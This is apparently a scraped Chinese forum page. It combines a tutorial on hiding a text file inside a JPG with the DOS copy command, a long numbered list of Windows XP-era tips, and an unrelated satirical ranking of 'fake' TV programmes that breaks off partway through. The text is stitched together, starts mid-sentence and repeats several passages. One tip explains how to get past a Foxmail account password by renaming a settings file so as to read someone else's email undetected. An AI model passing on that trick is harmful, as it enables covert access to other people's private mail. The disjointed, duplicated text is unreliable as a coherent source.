001.txt。另找一个非文本文件,最好为图片文件或可执行文件。以图片文件为例
,假设它的文件名为002.jpg。如果把它们都放到D盘根目录下,那么在Windows的
MS-DOS方式下执行以下命令:
我们都知道DOS命令Copy的主要作用是复制文件,可是你是否知道,它还有一个
作用是合并文件呢?
一般情况下,它主要用于合并相同类型的文件,比如将两个文本文件合并为一
个文本文件、将两个独立的MPEG视频文件合并为一个连续的视频文件等。那么,
如果用它合并两个不同类型的文件,结果会怎样呢?
笔者发现,巧妙地将一个文本文件合并到一个非文本文件中,可以实现隐藏秘密
的作用。一起来看看吧。
比如你有一段私人信息要隐藏起来,请先录入并保存为文本文件,假设保存为
001.txt。另找一个非文本文件,最好为图片文件或可执行文件。以图片文件为例
,假设它的文件名为002.jpg。如果把它们都放到D盘根目录下,那么在Windows的
MS-DOS方式下执行以下命令:
d:\Copy 002.jpg/b + 001.txt/a 003.jpg
其中参数/b指定以二进制格式复制、合并文件;参数/a指定以ASCII格式复制、合
并文件。这里要注意文件的顺序,二进制格式的文件应放在加号前,文本格式的
文件放在加号后。
执行该命令后,生成了一个新文件003.jpg。回到Windows中用图片浏览软件打开
这个它,你会发现它与002.jpg的显示结果一模一样——别着急,秘密马上揭晓!
用记事本打开003.jpg(在记事本的"打开"对话框中选择"文件类型"为"所有
文件"才能打开非TXT文件;或者直接用鼠标把图片拖进记事本窗口),你看到什
么了?一堆乱码吗?没错!但如果你按下Ctrl+End键将光标移至文件的尾部,哈
,你再看看!是不是001.txt文件中的内容?呵呵,"秘密"原来在这儿。
按照这种方法,你可以轻松地把一些重要信息隐藏起来,比如用户ID、密码、重
要私人信息等。
这个方法的确很巧妙,推荐尝试!哪怕你并不想隐藏什么,它也能带给你一种新
奇的感觉。但经过我的验证,有一点要提醒大家:就是这个文本文件的前面最好
空上3行以上,这样它头部的内容就不会丢失。
另外,你合并好文件后千万不要用记事本作任何改动,否则,你的图片就不能正
常显示了。切记!
小技巧汇总(如果你有更好的请跟帖子大家共分享)
我综合了网上的有关软件应用的小巧和自己的几个,希望对大家有用,如果你有更好的请跟帖子大家共分享!有关注册表修改的,请先备份注册表!
4、 永久不开启3721
- Win9x/Me
编辑文件 X:Windowshosts,添加一行代码:
download.3721.com 255.255.255.255
- WinNT/2000
编辑文件 X:WINNTsystem32driversetchosts,添加一行代码:
255.255.255.255 download.3721.com
- WinXP
编辑文件 X:Windowssystem32driversetchosts,添加一行代码:
255.255.255.255 download.3721.com
对于 CNNIC 的中文域名也可以用,域名改成 cdn2.cnnic.cn
7、 将MP3中音质不好的部分去除
修正MP3歌曲可以通过mp3Trim软件来实现。
运行程序之后载入需要修正的MP3歌曲,首先要知道需要截取的是哪一部分,在"从头部"处输入截取部分的开始时间,单击右边的小喇叭按钮,同时在"从尾部"处输入时间(这个时间是从文件末尾往前推的时间,所以此时间需用音乐总的时间减去刚才记下的时间来得到),单击右边的小喇叭按钮,紧接着选择保存便大功告成了。
除了从时间选择截取片段,mp3Trim支持从帧来选择截取片段,其操作方法与时间截取大同小异,而且其他诸如音量控制、淡入淡出效果等功能也很有特色。
我综合了网上的有关软件应用的小巧和自己的几个,希望对大家有用,如果你有更好的请跟帖子大家共分享!有关注册表修改的,请先备份注册表!
1、 影音文件在xp中无法删除
很多情况下是因为预览功能搞的鬼。开始|运行中输入并执行"REGSVR32 /U SHMEDIA.DLL",取消息预览。恢复时运行"REGSVR32 SHMEDIA.DLL"
其实就是去掉预览功能
2、 注册表解锁
方法一:
REGEDIT4 [HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem]
"DisableRegistryTools"=dword:00000000
3、 在xp下重装ie:
运行注册表编辑器,找到[HKEY_LOCAL_MACHINESOFTWAREMicrosoftActive SetupInstalled Components{89820200-ECBD-11cf-8B85-00AA005B4383}],把键值从1改成0,重启后xp将自动开始安装ie6
4、 永久不开启3721
- Win9x/Me
编辑文件 X:Windowshosts,添加一行代码:
download.3721.com 255.255.255.255
- WinNT/2000
编辑文件 X:WINNTsystem32driversetchosts,添加一行代码:
255.255.255.255 download.3721.com
- WinXP
编辑文件 X:Windowssystem32driversetchosts,添加一行代码:
255.255.255.255 download.3721.com
对于 CNNIC 的中文域名也可以用,域名改成 cdn2.cnnic.cn
5、 任务栏里的显示桌面丢失了怎么办?
简单的方法::
记事本新建输入:
[Shell]
Command=2
IconFile=explorer.exe,3
[Taskbar]
Command=ToggleDesktop
保存为 显示桌面.scf
拖到快速启动
6、 WIN98中用快捷方式实现一键关机
每次关闭计算机,都需要执行"开始/关闭计算机"命令,给本来就很简单的关机操作带来了很多麻烦,下面介绍一种实现一键关机的方法。首先需要在桌面的空白处单击鼠标右键,并且新建立一个"快捷方式",在弹出的创建快捷方式对话窗口中,在"命令行"中输入"C:windowsRUNDLL32.EXE user,ExitWindows",然后单击"下一步"按钮,给该快捷方式命名为"一键关机",这时系统的桌面上就会出现刚才建立的快捷方式了,打开该快捷方式的属性窗口,进入"快捷方式"页,并且给该快捷方式自定义一个快捷功能键,如F11,完成以后,就可以按F11键执行关机命令
7、 将MP3中音质不好的部分去除
修正MP3歌曲可以通过mp3Trim软件来实现。
运行程序之后载入需要修正的MP3歌曲,首先要知道需要截取的是哪一部分,在"从头部"处输入截取部分的开始时间,单击右边的小喇叭按钮,同时在"从尾部"处输入时间(这个时间是从文件末尾往前推的时间,所以此时间需用音乐总的时间减去刚才记下的时间来得到),单击右边的小喇叭按钮,紧接着选择保存便大功告成了。
除了从时间选择截取片段,mp3Trim支持从帧来选择截取片段,其操作方法与时间截取大同小异,而且其他诸如音量控制、淡入淡出效果等功能也很有特色。
8、 双击窗口左上角的图标可以关闭窗口
如果同时有多个窗口打开,想要关闭的话,可以按住shift不放然后点击窗口右上角的关闭图标
9、 输入法问题:
1)、解决安装officexp输入法图标问题:
只要把 x:windowssystem(x为安装windows的盘符)文件夹下的ctfmon.exe在dos下删除或改名即可。
(用该法操作后第一次启动电脑时,如发现输入法图标不再系统托盘中,可在控制面板的输入法图标 中把它找回来)
2)、找回office2003的输入窗口:
在注册表中[HKEY_CURRENT_USER/Control Panel/Input Method/]下的Show Status值变为0,
将其改为1。并重新登陆即可解决问题。
10、 用记事本减肥win2k
进入c:winntinfsysoc.inf在编辑菜单中选替换,在查找中输入"hide,"点击全部替换,在添加删除中可出现一些常见的选项,你可根据自己的需要进行选择。
sfc /purgecache
在运行里输入这个命令回车,可以清理很多缓存和一些备份文件,通常都能去掉300-400M的文件,对系统没有任何伤害,xp通用。
11、 用ghost压缩
随便找一个gho镜像文件,用ghost explorer把文件中的内容删除。用ghost explorer打开空gho文件,并在ghost explorer的窗口里点右键粘贴或是直接把文件拖进窗口就行了。(ghost explorer的压缩速度比winrar还要快,而添加、删除等都可以方便实现,用起来就象资源管理器一样)
12、win2000/XP在遇到系统严重问题无法启动时,可以利用故防恢复控制台,把c:windowsrepair文件夹中保存的初始化注册表文件(system、software、sam、security、default),复制进system32config(先将其同容备份后删除)中来换救系统
13、 手动下载xp升级补丁
许多朋友在装好sp1后通过windows update网上升级后还会发现有许多升级补丁,但是,如果通过windows update网上升级速度奇慢,有什么办法可以加速下载呢?通过实践,我发现一个小窍门。
步骤:
1):通过开始菜单里的windows update进行上网升级
2):选择"扫描以寻找更新"查找升级补丁。
3):"复查并安装更新"开始查看更新补丁说明。
4):点击"立即安装"跳出windows update--网页对话框开始下载补丁
5):选择取消,退出升级
6):打开c:windowsWindows Update.log
看见了吧!你所要得补丁下载地址都在这里!现在所要做的就是复制下载链接地址用网际快车(FlashGet)这类的下载软件进行下载。
14、 利用fc和>来分析注册表
例如,我们可以在安装软件前份一次注册表(如:c:first.reg),安装后再导出注册表文件(c:second.red)然后再在MS-DOS方式(纯DOS方式也行)下执行下列命令:
c:>fc first,reg second.reg>fc.txt (回车)
再打开fc,txt文件,即可查看该软件对注册表添加了哪些子项了。
注:重定向输入的文件类型一般为.txt形式也可以,如.wps 、.doc等,前提是必须安装相应的文件打开程序
15、 轻松破解foxmail账户口令
在foxmail中为了账户的安全,我们一般会为账户设置一个口令,如果忘了也不要紧。打开mail目录下以你的帐户命令的文件夹,删除accounf.stg。口令解除了。
不用删除,改个后缀名即可。系统会自动创建一个新的accounf.stg文件,出来后删除此文件,再改回原accounf.stg文件后缀,就能神不知鬼不觉看别人的邮件了。不过最好不要用于非法用途。
16、 局域网隐身法:
在局域网中常通过网上邻居查看局域网中其他用户的在线情况,如果你不希望别的用户知道你是否在线,这时可以在win2000/xp下运行cmd然后再运行net config server /hidden:yes 回车后就隐身啦。如果要取消只要把yes 改成no
17、 用winrar合并mp3:
把几首要合并的mp3文件选中,右键单击——添加到档案文件,压缩方式选择存储。然后把压缩好的文件后缀改成mp3。再放一下听听是不是两首歌已经合成一首啦。
18、 禁用设备驱动更新向导
这个设置可以允许你在设备管理器中禁用通过windows Update升级设备的驱动程序。
要进行这个设置,可以按以下步骤进行操作:在任务栏上点击开始按钮,然后在开始菜单中点击运行,输入regedit并点击确定,打开注册表编辑器。
展开HKEY_CURRENT_USERSoftwarePoliciesMicrosoftWindows NTDriver Signing
创建一个名为"NoDevMgrUpdate"的DWORD 键,然后设置键值为"1"。
你修改的设置会在你重启动电脑后生效
19、 改变驱动签名验证选项
这个设置可以让你决定在安装未经过签名或者测试的驱动程序时系统采取怎样的操作。要进行这个设置,可以按照以下步骤进行操作:在任务栏上点击开始按钮,然后在开始菜单中点击运行,输入regedit并点击确定,打开注册表编辑器。展开HKEY_CURRENT_USERSoftwarePoliciesMicrosoftWindows NTDriver Signing 创建一个名为"BehaviorOnFailedVerify"的DWORD 键,设置键值为"0"。你修改的设置会在你重启动电脑后生效。
20、 卸载传真和图片查看器
如果不想用XP自带的传真和图片查看器,你可以运行这个命令卸载它:
regsvr32 /u shimgvw.dll
21、 禁止officexp输入条
先在添加/删除程序里把《中文可选输入方法》禁用,然后在区域设置详细信息将除"英语(美国)"之外的其它输入法删除,最后运行
regsvr32 /u msimtf.dll
regsvr32 /u msctf.dll
22、 豪杰超级解霸V8
只要将安装目录中的VCvtShell.dll改名就可以去掉资源管理器中的按钮.
23、系统是2K或xp,如果你的系统分区是fat32格式,如果非法关机,下次启动的时候系统会运行磁盘扫描程序,但是启动的时候总是会有10秒钟的等待时间,如何去掉呢?
只要一个命令即可:
CHKNTFS /t:0
上面的0是等待秒数。
24、2k系统老是提示"无法装载动态链接库***.dll,系统找不到指定文件"把该文件copy到原路径也没用,这时你可以试试dos下的这个命令来修复系统文件:
sfc /scanonce
如果需要的话会提示插入2k光盘,然后重启就应该可以
25、 MyIE2里怎么改google搜索
MYIE2>设置中心>快捷搜索>*是默认搜索,最新"简体"中文搜索是http://www.google.com/search?q=% ... 2&lr=lang_zh-CN
26、 不用重新启动都可以应用修改后的注册表
修改注册表后,保存对注册表的修改。然后同时按下"Ctrl+Alt+Del"组合键,在弹
出的Windows任务列表,加亮"Explore",单击"结束任务",显示关机屏幕,单击
"否",稍候,弹出错误信息,单击"结束任务",Windows浏览器即会和新的注册表一
起重新装载。
27、 QQ自己加自己的方法:
在黑名单中加自己,然后再把自己拖到我的好友中就可 以了,然后再运行注册向导.
28、启动Winamp,并播放一首MP3,然后按住[SHIFT]不放,再单击面板上的"停止"按钮 ,你会发现音乐没有立即停止,而是逐渐降低音量直至完全消失,就象电台DJ做的一样
29、 原来硬盘图标也可以这么漂亮啊!
首先你得在网上下载几个你喜欢的图标(后缀名为.ico),分别放入每个驱动器的根目录下面,命名为如1.ico 然后新建一记事本,输入
[autorun]
icon=1.ico
然后保存为autorun.inf就可以了,重启系统就能看到效果了!另外最好把这两个文件的属性设置为"隐藏",主要是因为如果不这样做的话,你打开每个驱动器都可以看见这么两个文件,太丑了,而且也使我们把硬盘图标变漂亮的秘密给暴露了!
而且这一招还可以应用到光盘上,在你刻录的光盘上也加入一个autorun.inf文件和一个图标,那么你的光盘也会有这样的一个图标!
另外,把autorun.inf的内容改成:
[autorun]
open=xxx.exe
插入光盘时便会自动运行xxx.exe这个文件,这一招也很实用!
30、 RealOne Player是一个非常优秀的音视频播放软件,美中不足的是启动时间比较长,那我们何不想点办法来加快RealOne Player的启动速度呢?
1). 无声地启动
执行"开始→搜索→文件或文件夹"命令,分别查找"netid.smi"和"getmedia.ini"文件,找到后将它们更名,比如更名为"netid-old.smi"和"getmedia-old.ini",此后当你再次启动RealOne Player时,就不会再有欢迎音乐,软件也不会再尝试连接软件主页了。
2). 省略软件简介
在"Tools→Album info"中选中"Hide"项,则以后RealOne Player就不再显示产品简介了。
. 关闭媒体浏览器
RealOne Player提供了一个媒体浏览器,关闭它的方法是:在RealOne Player窗口右上角"关闭"按钮的下面,"地球"按钮的右面,找到一个三角箭头,单击这个箭头打开其下拉菜单,取消"show media browser"项前的勾即可
再次启动RealOne Player,感觉速度是不是快了许多?
31、 让中文文件名按笔画排序
在Windows的资源管理器中,不管文件(或文件夹)名是英文还是中文,当我们用"详细信息"方式查看时,在文件列表标题"名称"上单击,文件名默认的排序方式都是按字母的顺序排列的。如果你有大量的中文文件名,那么让中文文件名按笔画排序会更符合我们的使用习惯。方法是:
在Windows XP中双击"控制面板→区域和语言选项",切换到"区域选项"选项卡,单击"自定义"按钮打开"自定义区域选项"对话框,单击"排序"选项卡,在排序方法下拉列表中选择"笔画"。重新启动计算机后,打开资源管理器,单击文件列表标题"名称",会发现中文文件名已经按笔画多少排序了!
注意:该设置只影响中文名称文件,不管以"发音"还是以"笔画"排序,用英文命名的文件,其排序方式总是按名称排序。
32、 巧破网页禁用鼠标右键
巧破网页禁用鼠标右键
第一种情况,出现版权信息类的。破解方法如下:
在页面目标上按下鼠标右键,弹出限制窗口,这时不要松开右键,将鼠标指针移到窗口的"确定"按钮上,同时按下左键。现在松开鼠标左键,限制窗口被关闭了,再将鼠标移到目标上松开鼠标右键,哈哈,弹出了鼠标右键菜单,限制取消了!
第二种情况,出现"添加到收藏夹"的。破解方法如下:
在目标上点鼠标右键,出现添加到收藏夹的窗口,这时不要松开右键,也不要移动鼠标,而是使用键盘的TAB键,移动焦点到取消按钮上,按下空格键,这时窗口就消失了,松开右键后,我们熟悉的右键菜单又出现了。
第三种情况,超链接无法用鼠标右键弹出"在新窗口中打开"菜单的。这时用上面的两种方法无法破解,看看我这一招:在超链接上点鼠标右键,弹出窗口,这时不要松开右键,按键盘上的空格键,窗口消失了,这时松开右键,可爱的右键菜单又出现了,选择其中的"在新窗口中打开"就可以了。
上面的方法你全都知道?那再看下面的你知道不知道?在浏览器中点击"查看"菜单上的"源文件"命令,这样就可以看到html源代码了。不过如果网页使用了框架,你就只能看到框架页面的代码,此方法就不灵了,别急,我还有别的办法。
你按键盘上的Shift+F10组合键试试,可以直接调出右键菜单!
再看我这一招:看见键盘右Ctrl键左边的那个键了吗?按一下试试,右键菜单直接出现了!这一招在江湖上可是很少见到的,如何?还不行吗?
看来必须使出我的独门绝招了!要看仔细了,这可是江湖上从来没有出现过的"无敌****"哦!在屏蔽鼠标右键的页面中点右键,出现限制窗口,此时不要松开右键,用左手按键盘上的ALT+F4组合键,这时窗口就被我们关闭了,松开鼠标右键,菜单出现了!这一招一使出来,以上所有情况都可轻易破解掉.
33、 键盘"Print Screen"键的妙用四则
1、代替屏幕截图软件
按下Print Screen键,将会截取全屏幕画面。用鼠标点击"开始→程序→附件→画图",将会打开"画图"程序,点击该窗口中的"编辑→粘贴"菜单,这时会弹出一个"剪贴板中的图像比位图大,是否扩大位图?"对话框,点击"是",就会将该截取的图片粘贴到其中。再按下Ctrl+S键将图片保存即可。
2、抓取当前活动窗口
在使用Print Screen进行屏幕抓图时,同时按下Alt键,就会只抓取当前活动窗口,然后按上述方法保存即可。
3、截取游戏画面
我们都知道用键盘上的Print Screen键可以抓取系统中的桌面图案,然后在"画图"程序或是Photoshop之类的图像处理软件中可以"粘贴"出来。但是如果我们要抓的是游戏画面的话,上面这个方法可能就不灵光了。
没关系,启动Windows Media Player(6.0以上版本),打开一个视频文件,选择"文件→属性→高级",双击Video Renderer,在Direct Draw中,把YUV Flipping、RGB Flipping、YUV Overlaya和RGB Overlays四个选项取消,确定后退出。再试试看,用Print Screen键也可以抓游戏画面了。
4、截取DirectX图
Print Screen键无法截取DirectX图,没关系,只要我们略施小计,就可以让它大展拳脚。在"开始"菜单的"运行"中输入regedit,打开注册表编辑器,然后展开注册表到HKEY_Local_MachineSoftwareMicrosoftDirectDraw分支,新建一个"DWORD"值,并将其重命名为"EnablePrintScreen",填入键值"1",即可使Print Screen键具有截取DirectX图的功能。
35、、 快捷使用你的软件
在桌面上找到你最常用的软件的图标,点右键-属性,将快捷方式选项更改为你认为最合适的,比如我的myie2是F9,winamp是F10,QQ是F11,再在myie外部工具栏里添加你上网常用的软件,这样我开机时只要按F9、F10、F11,我三个最常用的软件就很快打开了,但是最好不要将快捷键设置与系统常用的相同,一般设置时会提示的!
36、、 用下载软件查看隐藏分区
操作系统:WINDOWS XP
分区格式:FAT32
下载软件:网际快车、影音传送带、迅雷、BT精灵
隐藏分区软件:优化大师或是通过修改注册表,原理是一样的,具体的不再详细说明。本人是用优化大师的优化功能隐藏了h盘。
情况一:下载工具中有H盘软件或文件的下载记录。 比如曾经用上面的任何一个下载工具下载了QQ在H盘,记录未删除。此时选择这个记录,以快车为例,任务-打开下载的文件目录,你会发现隐藏的H盘被打开,里面的文件可以进行操作了!呵呵!
情况二:下载工具中无隐藏分区的相关文件下载记录或无任何记录,而你怀疑或是知道隐藏了某个分区(比如我们现在知道我的电脑上隐藏了H盘),此时任意找到一个下载链接,以快车为例,用快车下载,保存在H盘任意一文件夹下,不一定要下载完毕,然后任务-打开下载的文件目录,H盘就被打开了,当然前提是确实隐藏了H盘。
37、 winxp自带批量重命名功能 ,
只要选中一堆文件,选重命名,然后改第一个文 件,改完后,其他文件也会自动修改
38、 改变win98录音机的录音长度限制
1).打开录音机,安下"录音"按钮,这时在录音窗口右侧显示本次录音的长度为60秒,左侧显示本次录音的位置。
2).待录音进行到一定的位置后,按下"停止"按钮。
3).打开"效果"菜单,选择"减速",这时你会发现录音窗口右面显示长度为100秒。不断重复操作,直到录音长度增加到合适长度。
4).按"收索到开头"按钮,然后再按"录音"开始正式录音,这时候录音的长度就不是一分钟了!
39、 Word文档加密小技巧
文件菜单设置:1、打开需要加密的Word文档。2、选"文件"的"另存为",出现"另存为"对话框,在"工具"中选"常规选项",出现"保存"选项卡。3、分别在"打开权限密码"和"修改权限密码"中输入密码(这两种密码可以相同也可以不同)。4、再次确认"打开权限密码"和"修改权限密码"。按"确定"退出"保存"选项卡。5、文件存盘。
由工具菜单设置:1、打开需要加密的Word文档。2、选"工具"菜单的"选项"命令,出现"选项对话框"。3、在"选项"对话框中选"保存"选项卡。4、分别在"打开权限密码"和"修改权限密码"中输入密码,点"确定"退出。5、将文件保存。
对模板加密
如果我们不想别人使用Word提供的通用模板(Narmal.dot)或自己精心创作的一个模板,可以对该模板进行加密,其方法是:1、打开通用模板文件(文件名是Narmal.dot,通常可以在C:\ProgramFiles\Mi-crosoft\Templetas文件夹中找到)。2、按上面的两种方法设置密码。3、点"工具栏"中的保存(或选"文件"菜单的"保存")。以后每次启动Word时,就会提示你输入密码。
40、 如何输入汉语拼音中的音调符号(如:ā、ě、ū、ǔ、ü、á等)
方法一:word软件中,单击"插入"/"符号"在弹出的"符号"对话框的"子集"框中选择"拉丁语扩展-A"然后在中间的大框中选择想要的符号,单击对话框下面的"插入",再单击"关闭"。
方法二:在"智能ABC输入法"中文输入状态,输入"V8",然后在列表中选择即可。(顺便说一下,当在"智能ABC输入法"中文输入状态,输入"V"+"一个0-9的数字",如"V1"、"V2"...,你会发现许多令人吃惊的玩意。
41、 删除"运行"中的历史记录
选择"开始"菜单中的"关闭系统"命令,然后在弹出的对话框中选择"否"返回Windows,再看看"运行"中的历史记录是不是都消除了呢?
42、 让"我的电脑"高高在上
默认情况下,在资源管理器中,Windows XP会把"我的文档"图标放在"我的电脑"图标上面。这种排列顺序让很多人在使用中感到很不适应。通过修改注册表,我们可以让"我的电脑"图标"跑"到"我的文档"图标之上,其操作方法是:
单击"开始→运行",键入"Regedit"后回车,打开注册表编辑器,依次展开[HKEY_CLASSES_ROOTCLSID\]分支,双击右侧窗口中名为"SortOrderIndex"的DWORD值,将它的值由"48"改为"54"即可。
43、 彻底删除"我的文档"
在Windows XP中,当我们删除"我的文档"中的"我的音乐"、"图片收藏"等文件夹后,重新启动计算机后又会产生这几个文件夹。其实,要想彻底删除"我的音乐"、"图片收藏"等文件夹,我们只要先在Windows"运行"对话框中输入"Regsvr32 /u mydocs.dll"这个命令,然后就可以彻底删除它们。
44、 禁止任务栏保存修改
在日常的教学过程中,经常发现学生有意无意地修改任务栏的属性。造成下次上机时任务栏、时间图标等信息不能正常显示。通过对注册表的修改可以让系统对所作修改不进行保存,当重新启动后,系统自动恢复到原来的设置。
单击"开始→运行",键入"Regedit"后回车,打开注册表编辑器,依次展开[HKEY_CURRENT_USERsoftwareMicrosoftWindowscurrentversion
policiesExplorer]分支,在右侧窗口中单击鼠标右键,选择"新建→DWORD值"命令,新建一个名为"nosavesettings"的DWORD值,并将其值设置为"1"即可。
45、 巧借Windows XP文件加速启动Windows 2000
大家一定感觉Windows XP的启动速明显比2000的快很多,这是因为它对主要启动文件NTDETECT.COM和NFLDR(此文件没扩展名,两个文件都在系统分区根目录下)作了优化,我们只要在相应语言版本的Windows XP系统下复制这两个文件至Windows 2000系统分区根目录下覆盖原文件即可。
中国十大虚假电视节目排行榜
| 首先声明一句,对于当下的电视节目,有格调的人或许会说:俺们从来不看电视!但电视走入千家万户,n个频道n种节目丰富或者填塞着小民百姓的业余生活,又怎能不成为晕晕大众生活的一部分。所以先拜托那些声称不爱看电视的高雅分子不要对这篇小文嗤之以鼻。小民小娱乐,过过眼瘾、过过嘴瘾罢了。 |
首先声明一句,对于当下的电视节目,有格调的人或许会说:俺们从来不看电视!但电视走入千家万户,n个频道n种节目丰富或者填塞着小民百姓的业余生活,又怎能不成为晕晕大众生活的一部分。所以先拜托那些声称不爱看电视的高雅分子不要对这篇小文嗤之以鼻。小民小娱乐,过过眼瘾、过过嘴瘾罢了。
而今天定下这个主题,还需罗索两句:所以虚假节目,是指的那种从策划到制作到情节到种种细节都虚假的节目,而并非那些虚假的人主持的节目。须知,虚假的人做的节目也有不虚假的,如虚假的朱军偶尔也会作出一个真诚的艺术人生。而有的,从主持,到编导,到制作,则是万分真诚的、不遗余力的、连自己也会被虚假感动得唏嘘的做着那些虚假透顶的电视节目。
个人观点,责任轻微。
虚假榜第十名:李湘版《快乐大本营》——湖南卫视
上榜理由:说实在的,我简直都不想再提这个被人说滥了嘴的节目。虽然主持人的娇嗲做作早被汪洋口水涮过几百遍啊几百遍,但今天这个不属于我的讨论范围,单论它的内容吧——我还记得快乐大本营从前是很喜欢拿几个小孩子上来,说几句有趣的话,弄一些叽叽喳喳的小桥段的,可分明那帮小孩子上台说什么、做什么,都是被事先安排好的,明眼人一看就知道。有一次还真的穿了帮,小孩子在情节进行之前就把该说的该做的都说了做了,把李湘何炯在那汗得!连小孩子的出场都作假,更何况其他内容呢?
话说回来:本来这就是一个以庸俗取乐、以闹腾见长的节目。能要求它有多真实?况且现在钻石李已经走鸟,《快乐大本营》也全新改版鸟,作假的桥段也减少鸟,所以虚假榜排名也相应降低鸟。
虚假宣言:只要您乐,假点没关系~
虚假榜第九名:毕福剑《梦想剧场》——央视三套
上榜理由:其实,看这节目有时还真的觉得可乐。可既然是"剧场",就必然"作假",因为戏不就是做给人看的吗?可是我一直没弄明白,这个剧场,实现的到底是百姓的梦想?观众的梦想?还是那些请去当嘉宾的明星腕儿的梦想?因为我看来看去,在梦想剧场出现最多的、形象最丰满的、做戏做得最不遗余力来来去去就只有毕主持啦、尹胖子啦、某个央视的嘉宾主播或者过气艺人啦,等等。说真的,为平头百姓们实现梦想的剧场,假点我也认了;其它的梦想剧场,还是歇了吧。
话说回来:就算满足了明星们的曝露欲吧,有时观众也是爱看得不是?譬如,曝露得恰到好处、曝露得惊鸿一瞥,正是春光外泄、好看好看。
虚假宣言:俺们明星练摊的地儿,凭什么不能假?
虚假榜第八名:刘仪伟《淑女大学堂》——光线传媒
上榜理由:第一次我看这节目,下巴都掉到裤带上。不是因为看到那排排坐的淑女很"淑女",而是那些淑女太"小姐"!我不确定是否淑女大学堂就一定要摆上一些花瓶似的、搔首弄姿的、浪笑倩兮淫目盼兮的女人们在旁边,一边听主持人说话一边发嗲发浪。也不确定是否一旦涉及两性话题,必然带上某种小资的、貌似精致的、放浪形骸的风气。这个节目,最假就假在——明明是一些来路不明的女人、明明张口说的都是事先编辑们写好的话,可节目的宗旨偏要突出一种小资女人的取向,好像大家说的话都是语不惊人死不休的、大家的思想都是前卫时髦深刻思辨的,最后还要搞个什么颁奖?——假得让我晕~~~
话说回来:看美女作假,无妨无妨。
虚假宣言:当代淑女,不假怎么叫淑女?
虚假榜第七名:汪涵、杨乐乐《玫瑰之约》——湖南卫视
上榜理由:我最烦这些电视红娘一类的节目了,一点技术含量都没有。不就是在屏幕前露个脸儿、做一把帅哥美女秀、满足一下观众的意淫偷窥需要吗?不过,咱们的电视红娘也做得太不要脸了一点,虽然这节目本就是嘉宾发骚观众受乐的,但总要表现一点红娘或者媒婆的诚意吧是不?总不能做得像个拉皮条的吧?骨子里面已经是拉皮条性质了,可有时又偏来个煽情,主持人嘉宾一起哭个稀里哗啦的,叫人吐得怎么习惯?哎,想当年,我是多么喜欢汪涵大哥的节目啊~
话说回来:这年头,爱情怎会不掺假?那爱情和婚配当噱头作节目的,自有它存在之理由。
虚假宣言:假到海枯石烂,方显皮条本质。
虚假榜第六名:《时空连线》——央视新闻频道
上榜理由:我咬了咬牙,终于将这个看似道貌岸然的节目搬上了排行。我一直弄不明白这个《时空连线》到底是什么意思?央视的记者懒到这一步,连跑跑腿采访一次也不愿意做吗?还是要显示咱们的无线通讯事业很发达?如果是身处异常环境,无法实现现场采访的,倒是可以理解,可是连线的,分明很多就是那些当官的、坐办公室的——什么样的办公室如此壁垒森严呢!退一万步说吧,采取连线采访的方式,大多发生在即时的、突发的情况下,采访者与被采访者都应该是即问即答的方式,可是咱们的连线两头,那问答如此流畅自如,一听就是事先做好准备,说不上照本宣科、但总是了然于胸的。有时真想说:你们还真"做"的出啊!
话说回来:到底讨论的是国家大事、社会民生,"做"一"做"尚可以原谅。只是要多学学别人,远的不说就说凤凰卫视的连线访谈,看他们怎样"做"出来的。
虚假宣言:不"做"怎知"工夫"深?
虚假榜第五名:《同一首歌》——央视三套
上榜理由:哇咔咔,终于说到前五了,精神为之一振。相信全国观众看不惯《同一首歌》的占大多数,一是因其恶心的明星阵容,简直就是过气明星大集合(当然不排除偶尔来几个不过气的);二是因其奢靡铺张而空洞无物的内容和形式。别的不提。单说它最大罪状的"假"——美其名曰"走进**",仿佛就像文艺下乡给百姓送温暖、"功德无上"地极大程度丰富人民群众的精神生活一般。可是稍微用点脑子都想得到,其实就是配合当地政府搜刮老百姓的活儿,所谓文艺搭台、经济唱戏而已。据知情者透露,一台晚会一般花费几百万,这个钱谁出?花谁的钱不心疼啊,花老百姓的钱最不心疼!你"走进"一下,热闹一下,疯癫一下,花痴一下,大小明星露个脸,当地的知名度就打开了?发展就加速了?百姓生活就比蜜甜了?不知道要标榜什么,真是莫名其妙。另外,此节目的细节形势也极其向虚假做作发展。譬如主持人:下面到了最激动人心的点歌环节啦!你们想听谁的歌啊?——狂吐!狂晕!我想听帕瓦罗蒂唱歌你有吗?譬如请一位观众与歌星同歌,结果那观众表演的比明星还明星,是从哪个歌舞团歌舞厅发掘出来的后备力量啊?如此种种,不堪言说......
话说回来:咬着牙为它说句话吧,搭个戏台子也不容易是不?
虚假宣言:走进虚假,钞票多多。
虚假榜第四名:《春节联欢晚会》——央视
上榜理由:没有别的理由,金碧辉煌、歌舞升平、粉饰太平,歌星唱没有个性的歌、笑星说逗不起乐的话,个个春花灿烂的脸皮后是绷紧的神经——仿佛有个声音在提醒他们:要快乐的笑啊!要扯开喉咙叫嚷啊!可别松懈别出丑了啊!全国人民再看着你啊!记得电视机前的我只想劝他们一句:放松点行不大哥大姐大爷们,要不要给做个桑拿按摩啊?不然假笑得肌肉都僵硬啦!
话说回来:假,是为了配合大好形势下的欢乐祥和气氛呀!
虚假宣言:为了过好年,情愿假一点。
虚假榜第三名:《超级女声》——湖南娱乐频道
上榜理由:首先我想问这些制片人们,"提倡大众娱乐"是不是就是指当大众是傻子的前提下堂而皇之的作假贩假?海选是个什么性质?提倡全民参与?还是给节目填些噱头让那些没有自知之明的家伙在镜头前装个疯卖个傻?你以为人人都是孔令祥,以至于不是孔令祥的都不能入你们法眼?明明唱的好的比不过唱的坏的,声音和素质是不是都是次要的?炒作和包装是不是你们的最终目的?那为何还要提"超级女声以唱为本"这样的超级谎言?那些评委是什么素质?娱乐公司的老总就一定懂得唱歌了?声称不懂声乐的所谓美女评委(我看是呕妇评为更佳)居然能对选手唱歌指手画脚?2元一条的短信电话投票是个什么意思?光是大屏幕上的几个数字吗?还是落入你们腰包的额外收入?哎哎,这节目,怎一个假字了得!
话说回来:居然还要为这种假到透顶的节目说话?哎,杀了我吧。
虚假宣言:超级女声,以假为本。
虚假榜第二名:《非常6+1》——央视二套
